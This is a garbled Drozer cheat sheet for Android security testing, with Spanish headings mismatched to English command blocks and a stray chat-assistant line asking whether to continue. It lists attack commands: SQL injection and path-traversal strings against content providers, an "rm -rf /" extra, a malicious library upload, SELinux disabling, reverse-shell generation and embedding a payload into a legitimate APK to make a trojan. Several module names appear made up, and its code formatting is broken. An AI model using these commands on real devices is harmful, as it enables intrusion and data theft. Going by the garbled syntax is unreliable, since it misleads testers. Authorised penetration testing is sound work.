Hoja de Referencia de Drozer¶
Descripción General¶
Drozer es un marco integral de pruebas de seguridad para aplicaciones Android. Te permite asumir el rol de una aplicación Android e interactuar con la máquina virtual Dalvik, los puntos finales IPC de otras aplicaciones y el sistema operativo subyacente. Drozer proporciona herramientas para la explotación remota de dispositivos Android a través de aplicaciones maliciosas y una evaluación de seguridad completa de aplicaciones Android.
⚠️ Advertencia: Utiliza Drozer solo en dispositivos y aplicaciones que poseas o para los que tengas permiso explícito de prueba. El uso no autorizado puede violar los términos de servicio o leyes locales.
Instalación¶
Requisitos Previos¶
Instalación en Linux¶
Instalación en macOS¶
Instalación en Windows¶
Configuración del Dispositivo Android¶
Uso Básico¶
Conectarse al Dispositivo¶
Comandos Básicos¶
Análisis de Paquetes¶
Información del Paquete¶
Componentes de la Aplicación¶
Pruebas de Actividad¶
Enumeración de Actividades¶
Explotación de Actividades¶
Pruebas de Servicio¶
Enumeración de Servicios¶
Explotación de Servicios¶
Pruebas de Proveedor de Contenido¶
Enumeración de Proveedor de Contenido¶
Explotación de Proveedor de Contenido¶
Pruebas de Receptor de Transmisión¶
Enumeración de Receptor de Transmisión¶
Explotación de Receptor de Transmisión¶
Análisis del Sistema de Archivos¶
Enumeración del Sistema de Archivos¶
Explotación del Sistema de Archivos¶
Would you like me to continue with the remaining sections or placeholders?```bash
Install Java Development Kit¶
sudo apt update sudo apt install openjdk-11-jdk
Install Python 2.7 (required for Drozer)¶
sudo apt install python2.7 python2.7-dev python-pip
Install Android SDK and ADB¶
sudo apt install android-tools-adb android-tools-fastboot
Set JAVA_HOME environment variable¶
export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64 echo 'export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64' >> ~/.bashrc
### Linux Installation
```bash
# Download Drozer
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk
# Install Drozer
pip2 install drozer-2.4.4-py2-none-any.whl
# Alternative: Install from source
git clone https://github.com/FSecureLABS/drozer.git
cd drozer
python2 setup.py install
macOS Installation¶
# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
# Install Python 2.7
brew install python@2
# Install Drozer
pip2 install drozer
# Download Drozer agent APK
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk
Windows Installation¶
# Install Python 2.7 from python.org
# Download and install from: https://www.python.org/downloads/release/python-2718/
# Install Drozer using pip
pip install drozer
# Download Drozer agent APK
# Download from: https://github.com/FSecureLABS/drozer/releases/
Android Device Setup¶
# Enable USB debugging on Android device
# Settings > Developer Options > USB Debugging
# Install Drozer agent on device
adb install drozer-agent-2.4.4.apk
# Start Drozer agent on device
# Open Drozer Agent app and toggle "Embedded Server" ON
# Forward port for communication
adb forward tcp:31415 tcp:31415
Basic Usage¶
Connecting to Device¶
# Connect to Drozer agent
drozer console connect
# Connect with specific endpoint
drozer console connect --server 192.168.1.100:31415
# List available devices
drozer console devices
# Connect to specific device
drozer console connect --device <device_id>
Basic Commands¶
# List available modules
dz> list
# Get help for specific module
dz> help app.package.list
# List installed packages
dz> run app.package.list
# Get package information
dz> run app.package.info -a com.example.app
# List activities
dz> run app.activity.info -a com.example.app
# List services
dz> run app.service.info -a com.example.app
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
Package Analysis¶
Package Information¶
# List all packages
dz> run app.package.list
# List packages with filter
dz> run app.package.list -f keyword
# Get detailed package information
dz> run app.package.info -a com.example.app
# List package permissions
dz> run app.package.info -a com.example.app -p
# Find packages with specific permission
dz> run app.package.list -p android.permission.INTERNET
# List system packages
dz> run app.package.list -f system
# List third-party packages
dz> run app.package.list -3
Application Components¶
# List activities
dz> run app.activity.info -a com.example.app
# List exported activities
dz> run app.activity.info -a com.example.app -e
# List services
dz> run app.service.info -a com.example.app
# List exported services
dz> run app.service.info -a com.example.app -e
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e
# List content providers
dz> run app.provider.info -a com.example.app
# List exported content providers
dz> run app.provider.info -a com.example.app -e
Activity Testing¶
Activity Enumeration¶
# Find activities in package
dz> run app.activity.info -a com.example.app
# Find exported activities
dz> run app.activity.info -a com.example.app -e
# Find activities with intent filters
dz> run app.activity.info -a com.example.app -i
# Search for activities by permission
dz> run app.activity.info -p android.permission.CAMERA
Activity Exploitation¶
# Start activity
dz> run app.activity.start --component com.example.app com.example.MainActivity
# Start activity with extras
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string username admin --extra string password secret
# Start activity with intent data
dz> run app.activity.start --component com.example.app com.example.MainActivity --data-uri content://com.example.provider/data
# Start activity with specific action
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://malicious.com
# Test for intent injection
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string debug true
Service Testing¶
Service Enumeration¶
# List services in package
dz> run app.service.info -a com.example.app
# List exported services
dz> run app.service.info -a com.example.app -e
# Find services with specific permissions
dz> run app.service.info -p android.permission.BIND_DEVICE_ADMIN
Service Exploitation¶
# Start service
dz> run app.service.start --component com.example.app com.example.BackgroundService
# Start service with extras
dz> run app.service.start --component com.example.app com.example.BackgroundService --extra string command "rm -rf /"
# Send intent to service
dz> run app.service.send com.example.app com.example.BackgroundService --extra string action "backup_data"
# Test service binding
dz> run app.service.bind com.example.app com.example.BackgroundService
Content Provider Testing¶
Content Provider Enumeration¶
# List content providers
dz> run app.provider.info -a com.example.app
# List exported content providers
dz> run app.provider.info -a com.example.app -e
# Find URIs for content provider
dz> run app.provider.finduri com.example.provider
# Scan for accessible content URIs
dz> run scanner.provider.finduris -a com.example.app
Content Provider Exploitation¶
# Query content provider
dz> run app.provider.query content://com.example.provider/users
# Query with selection
dz> run app.provider.query content://com.example.provider/users --selection "username=?" --selection-args admin
# Insert data into content provider
dz> run app.provider.insert content://com.example.provider/users --string username hacker --string password secret
# Update data in content provider
dz> run app.provider.update content://com.example.provider/users --selection "id=1" --string password newpassword
# Delete data from content provider
dz> run app.provider.delete content://com.example.provider/users --selection "username=admin"
# Test for SQL injection
dz> run app.provider.query content://com.example.provider/users --selection "username='admin' OR '1'='1'"
# Read files via content provider
dz> run app.provider.read content://com.example.provider/files/../../etc/hosts
# Download files
dz> run app.provider.download content://com.example.provider/files/secret.txt /tmp/secret.txt
Broadcast Receiver Testing¶
Broadcast Receiver Enumeration¶
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e
# Find receivers for specific intent
dz> run app.broadcast.info -i android.intent.action.BOOT_COMPLETED
Broadcast Receiver Exploitation¶
# Send broadcast intent
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION
# Send broadcast with extras
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string command "reboot"
# Send system broadcasts
dz> run app.broadcast.send --action android.intent.action.BOOT_COMPLETED
# Send ordered broadcast
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string priority high
# Test for broadcast injection
dz> run app.broadcast.send --action com.example.ADMIN_ACTION --extra boolean admin_mode true
File System Analysis¶
File System Enumeration¶
# List application files
dz> run tools.file.list /data/data/com.example.app/
# Find readable files
dz> run tools.file.readable /data/data/com.example.app/
# Find writable files
dz> run tools.file.writable /data/data/com.example.app/
# Search for files with specific patterns
dz> run tools.file.find /data/data/com.example.app/ "*.db"
# Find world-readable files
dz> run tools.file.permissions /data/data/com.example.app/
File System Exploitation¶
```bash
Read file contents¶
dz> run tools.file.read /data/data/com.example.app/shared_prefs/config.xml
Download file¶
dz> run tools.file.download /data/data/com.example.app/databases/app.db /tmp/app.db
Upload file¶
dz> run tools.file.upload /tmp/malicious.so /data/data/com.example.app/lib/malicious.so
Create symbolic link¶
dz> run tools.file.symlink /data/data/com.example.app/secret.txt /sdcard/exposed_secret.txt
Change file permissions¶
dz> run tools.file.chmod 777 /data/data/com.example.app/config.txt
## Análisis de Base de Datosbash
Find SQLite databases¶
dz> run tools.file.find /data/data/com.example.app/ "*.db"
Connect to SQLite database¶
dz> run tools.sqlite.connect /data/data/com.example.app/databases/app.db
List tables in database¶
dz> run tools.sqlite.tables /data/data/com.example.app/databases/app.db
Query database¶
dz> run tools.sqlite.query /data/data/com.example.app/databases/app.db "SELECT * FROM users"
Test for SQL injection in content providers¶
dz> run app.provider.query content://com.example.provider/users --selection "username='; DROP TABLE users; --"
Dump database schema¶
dz> run tools.sqlite.schema /data/data/com.example.app/databases/app.db
Export database¶
dz> run tools.sqlite.dump /data/data/com.example.app/databases/app.db > /tmp/database_dump.sql
### Pruebas de Base de Datos SQLitebash
Check network security config¶
dz> run tools.file.read /data/data/com.example.app/res/xml/network_security_config.xml
List network interfaces¶
dz> run tools.setup.network
Check for cleartext traffic¶
dz> run scanner.misc.checknetworksecurityconfig -a com.example.app
Test for certificate pinning bypass¶
dz> run scanner.misc.checkpinning -a com.example.app
## Análisis de Redbash
Test SSL certificate validation¶
dz> run scanner.misc.native -a com.example.app
Check for weak SSL implementations¶
dz> run scanner.misc.checkssl -a com.example.app
Test for certificate transparency¶
dz> run scanner.misc.checkcertificatetransparency -a com.example.app
### Configuración de Redpython
Create custom Drozer module¶
File: ~/.drozer_modules/custom/exploit.py¶
from drozer.modules import common, Module
class CustomExploit(Module, common.FileSystem, common.PackageManager): name = "Custom Exploit Module" description = "Custom exploitation module" examples = "run custom.exploit -a com.example.app" author = "Security Researcher" date = "2024-01-01" license = "BSD (3 clause)" path = ["custom"]
def add_arguments(self, parser):
parser.add_argument("-a", "--package", help="target package")
def execute(self, arguments):
if arguments.package:
self.stdout.write("Exploiting package: %s\n" % arguments.package)
# Custom exploitation logic here
else:
self.stdout.write("Please specify target package\n")
### Pruebas SSL/TLSbash
Generate malicious APK¶
dz> run payload.apk.create --output /tmp/malicious.apk
Generate reverse shell payload¶
dz> run payload.reverse.shell --lhost 192.168.1.100 --lport 4444
Generate bind shell payload¶
dz> run payload.bind.shell --port 4444
Embed payload in legitimate APK¶
dz> run payload.apk.embed --original /tmp/legitimate.apk --payload /tmp/payload.apk --output /tmp/trojan.apk
## Explotación Avanzadabash
Check for root access¶
dz> run tools.setup.busybox
Exploit setuid binaries¶
dz> run exploit.setuid.find
Test for kernel exploits¶
dz> run exploit.kernel.check
Exploit application vulnerabilities¶
dz> run exploit.app.privilege -a com.example.app
Test for directory traversal¶
dz> run exploit.traversal.test -a com.example.app
### Desarrollo de Módulos Personalizadospython
!/usr/bin/env python2¶
import subprocess import json import sys
class DrozerAutomation: def init(self, package_name): self.package = package_name self.results = \\{\\}
def run_drozer_command(self, command):
"""Execute Drozer command and return output"""
try:
cmd = ["drozer", "console", "connect", "-c", command]
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
return output.decode('utf-8')
except subprocess.CalledProcessError as e:
return f"Error: \\\\{e.output.decode('utf-8')\\\\}"
def analyze_package(self):
"""Perform comprehensive package analysis"""
print(f"[+] Analyzing package: \\\\{self.package\\\\}")
# Package information
self.results['package_info'] = self.run_drozer_command(
f"run app.package.info -a \\\\{self.package\\\\}"
)
# Activities
self.results['activities'] = self.run_drozer_command(
f"run app.activity.info -a \\\\{self.package\\\\}"
)
# Services
self.results['services'] = self.run_drozer_command(
f"run app.service.info -a \\\\{self.package\\\\}"
)
# Content Providers
self.results['providers'] = self.run_drozer_command(
f"run app.provider.info -a \\\\{self.package\\\\}"
)
# Broadcast Receivers
self.results['receivers'] = self.run_drozer_command(
f"run app.broadcast.info -a \\\\{self.package\\\\}"
)
return self.results
def test_exported_components(self):
"""Test exported components for vulnerabilities"""
print("[+] Testing exported components")
# Test exported activities
exported_activities = self.run_drozer_command(
f"run app.activity.info -a \\\\{self.package\\\\} -e"
)
# Test exported services
exported_services = self.run_drozer_command(
f"run app.service.info -a \\\\{self.package\\\\} -e"
)
# Test exported providers
exported_providers = self.run_drozer_command(
f"run app.provider.info -a \\\\{self.package\\\\} -e"
)
return \\\\{
'exported_activities': exported_activities,
'exported_services': exported_services,
'exported_providers': exported_providers
\\\\}
def test_content_providers(self):
"""Test content providers for vulnerabilities"""
print("[+] Testing content providers")
# Find URIs
uris = self.run_drozer_command(
f"run app.provider.finduri \\\\{self.package\\\\}"
)
# Scan for accessible URIs
accessible_uris = self.run_drozer_command(
f"run scanner.provider.finduris -a \\\\{self.package\\\\}"
)
return \\\\{
'uris': uris,
'accessible_uris': accessible_uris
\\\\}
def generate_report(self):
"""Generate comprehensive security report"""
report = \\\\{
'package': self.package,
'analysis_results': self.results,
'exported_components': self.test_exported_components(),
'content_provider_tests': self.test_content_providers()
\\\\}
with open(f"\\\\{self.package\\\\}_security_report.json", 'w') as f:
json.dump(report, f, indent=2)
print(f"[+] Report saved: \\\\{self.package\\\\}_security_report.json")
return report
Usage¶
if name == "main":
if len(sys.argv) != 2:
print("Usage: python2 drozer_automation.py
package_name = sys.argv[1]
analyzer = DrozerAutomation(package_name)
analyzer.analyze_package()
analyzer.generate_report()
### Generación de Payloadbash
!/bin/bash¶
Batch testing script for multiple packages¶
PACKAGES_FILE="packages.txt" RESULTS_DIR="drozer_results"
mkdir -p $RESULTS_DIR
while IFS= read -r package; do echo "[+] Testing package: $package"
# Create package-specific directory
mkdir -p "$RESULTS_DIR/$package"
# Run comprehensive tests
drozer console connect -c "run app.package.info -a $package" > "$RESULTS_DIR/$package/package_info.txt"
drozer console connect -c "run app.activity.info -a $package -e" > "$RESULTS_DIR/$package/exported_activities.txt"
drozer console connect -c "run app.service.info -a $package -e" > "$RESULTS_DIR/$package/exported_services.txt"
drozer console connect -c "run app.provider.info -a $package -e" > "$RESULTS_DIR/$package/exported_providers.txt"
drozer console connect -c "run app.broadcast.info -a $package -e" > "$RESULTS_DIR/$package/exported_receivers.txt"
# Test content providers
drozer console connect -c "run scanner.provider.finduris -a $package" > "$RESULTS_DIR/$package/provider_uris.txt"
# Test for common vulnerabilities
drozer console connect -c "run scanner.provider.injection -a $package" > "$RESULTS_DIR/$package/sql_injection.txt"
drozer console connect -c "run scanner.provider.traversal -a $package" > "$RESULTS_DIR/$package/path_traversal.txt"
echo "[+] Results saved to $RESULTS_DIR/$package/"
done < "$PACKAGES_FILE"
echo "[+] Batch testing completed"
### Escalada de Privilegiosbash
Check if Drozer agent is running¶
adb shell am start -n com.mwr.dz/.activities.MainActivity
Verify port forwarding¶
adb forward --list adb forward tcp:31415 tcp:31415
Restart ADB server¶
adb kill-server adb start-server
Check device connectivity¶
adb devices
Test connection manually¶
telnet localhost 31415
## Scripts de Automatizaciónbash
Reinstall Drozer agent¶
adb uninstall com.mwr.dz adb install drozer-agent-2.4.4.apk
Check agent permissions¶
adb shell dumpsys package com.mwr.dz
Enable agent in device settings¶
Settings > Apps > Drozer Agent > Permissions¶
Check if agent service is running¶
adb shell ps|grep drozer
### Script de Evaluación Integralbash
Refresh module list¶
dz> reload
Check module path¶
dz> list
Install custom modules¶
mkdir -p ~/.drozer_modules cp custom_module.py ~/.drozer_modules/
Debug module loading¶
dz> help custom.module
### Script de Pruebas por Lotesbash
Check required permissions¶
adb shell dumpsys package com.example.app|grep permission
Grant permissions manually¶
adb shell pm grant com.example.app android.permission.READ_EXTERNAL_STORAGE
Check SELinux status¶
adb shell getenforce
Disable SELinux (if rooted)¶
adb shell su -c "setenforce 0"
## Resolución de Problemasbash
Increase timeout values¶
dz> set timeout 30
Reduce output verbosity¶
dz> set verbose false
Clear cache¶
rm -rf ~/.drozer/cache/
Use specific device¶
drozer console connect --device